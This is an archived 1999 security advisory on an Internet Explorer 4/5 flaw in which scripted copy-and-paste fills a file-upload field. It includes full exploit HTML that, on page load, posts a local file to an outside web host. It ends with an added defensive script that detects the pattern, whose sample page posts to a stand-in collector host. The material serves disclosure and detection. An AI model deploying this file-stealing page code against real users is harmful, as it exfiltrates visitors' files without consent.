cuartango-msie.txt

17 Aug 1999. Reported by Packet Storm. Type: packetstorm. Source: packetstormsecurity.com

Security hole in Microsoft Internet Explorer allows file transfer to malicious sites via scripting.

`Cuartango security Hole   
  
http://pages.whowhere.com/computers/cuartangojc/cuartangoh1.html  
  
Affected software  
Microsoft Internet Explorer 4  
Microsoft Internet Explorer 5 Preview  
  
Risks  
Major : Your computer files can be sent to a WEB site by a malicious Script (if the file name is known).  
  
Technical description  
There is an input form field used to transfer files from the browsing computer to a WEB site. This  
input field is HTML coded as :  
  
<input type="file" name="filename" size="30">  
  
Theoretically this input field can be filled only by the user by clicking a "Browse" button or  
typing the file name.  
In order to avoid a security hole, scripts are not allowed to modify the value of this input   
field, so the statement below will not work (very clever MS Explorer programmers) :  
  
document.forms[0].filename = "C:\config.sys";  
  
What Microsoft programmers forgot is that "copy" and "paste" commands are possible in scripting with  
Internet Explorer 4 and they did not protect the file input field against this operation.  
The attack is then evident :  
1- Create a second form with a hidden field named "T1" containing the file name you want to hack.  
2- In the HTML Body Onload event fire a script :  
  
<body onload="getfile()">  
  
function getfile()  
{  
document.forms[1].T1.select();  
document.execCommand("copy");  
document.forms[0].filename.select();  
document.execCommand("paste");  
document.forms[0].submit();  
}  
  
The result is that the file is POSTED to the malicious WEB site defined in the form action property.  
  
  
----------exploit code example----------  
  
<html>  
<script language="JavaScript">  
  
function getfile()  
{  
document.forms[1].T1.select();  
document.execCommand("copy");  
document.forms[0].filename.select();  
document.execCommand("paste");  
window.open("cuartangoh3.html");  
document.forms[0].submit();  
}  
  
</script>  
  
  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">  
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">  
<title>Cuartango Hole 2</title>  
</head>  
  
<body onload="getfile()">  
  
<form enctype="multipart/form-data" method="post"  
action="http://www.angelfire.com/cgi-bin/bedit">  
<input type="hidden" name="storage" value="ab"><input type="hidden" name="hpd"  
value="cuartangojc"><input type="hidden" name="password" value="asisea"><p><strong>I am  
transfering your file</strong> <input type="file" name="filename" size="30"> <strong>to my  
web site </strong>&nbsp; </p>  
</form>  
  
<form method="POST">  
<input type="hidden" name="T1" value="/test.txt"><p>&nbsp;</p>  
</form>  
  
</body>  
</html>  
  
`
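
As an added example (not part of the original advisory), a static check that flags page source combining the three elements the technical description relies on: a file input, a scripted `execCommand("paste")` and a scripted form submit. The names `attr` and `auditPage` and both sample pages are constructed here for illustration.

```javascript
// Static heuristic for the scripted copy/paste-into-file-input pattern.
// Regex over source text, not an HTML parser; all names here are hypothetical.

// Read one attribute value from a single tag's source text.
function attr(tag, name) {
  const re = new RegExp("\\b" + name + "\\s*=\\s*(?:\"([^\"]*)\"|'([^']*)'|([^\\s>]+))", "i");
  const m = re.exec(tag);
  return m ? (m[1] || m[2] || m[3] || "") : null;
}

function auditPage(html) {
  const src = html.replace(/<!--[\s\S]*?-->/g, ""); // commented-out markup never runs
  const inputs = src.match(/<input\b[^>]*>/gi) || [];
  const forms = src.match(/<form\b[^>]*>/gi) || [];
  const indicators = {
    fileInput: inputs.some((t) => (attr(t, "type") || "").toLowerCase() === "file"),
    scriptedPaste: /execCommand\s*\(\s*["']paste["']/i.test(src),
    scriptedSubmit: /\.submit\s*\(\s*\)/.test(src),
    runsOnLoad: /<body\b[^>]*\bonload\s*=/i.test(src) || /\bonload\s*=\s*function/i.test(src),
  };
  // Where a multipart (file-carrying) form would post its contents.
  const uploadTargets = forms
    .filter((t) => (attr(t, "enctype") || "").toLowerCase() === "multipart/form-data")
    .map((t) => attr(t, "action") || "(same page)");
  let verdict = "clean";
  if (indicators.fileInput && indicators.scriptedPaste) {
    verdict = indicators.scriptedSubmit ? "match" : "review";
  }
  return { verdict, indicators, uploadTargets };
}

// Constructed sample: the structure the advisory describes, reduced.
const SAMPLE_FLAGGED = `
<body onload="go()"><script>
function go(){ document.forms[1].T1.select(); document.execCommand("copy");
  document.forms[0].filename.select(); document.execCommand("paste");
  document.forms[0].submit(); }
</script>
<form enctype="multipart/form-data" method="post" action="http://collector.example.invalid/up">
<input type="file" name="filename"></form>
<form><input type="hidden" name="T1" value="/test.txt"></form></body>`;

// Constructed sample: an ordinary upload form the user fills in and submits.
const SAMPLE_BENIGN = `
<body><form enctype="multipart/form-data" method="post" action="/upload">
<input type="file" name="attachment"><input type="submit" value="Send"></form></body>`;

console.log(auditPage(SAMPLE_FLAGGED).verdict, auditPage(SAMPLE_BENIGN).verdict);
```

A "review" verdict means a file input and a scripted paste are present without a scripted submit, which still merits a manual look at the page.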
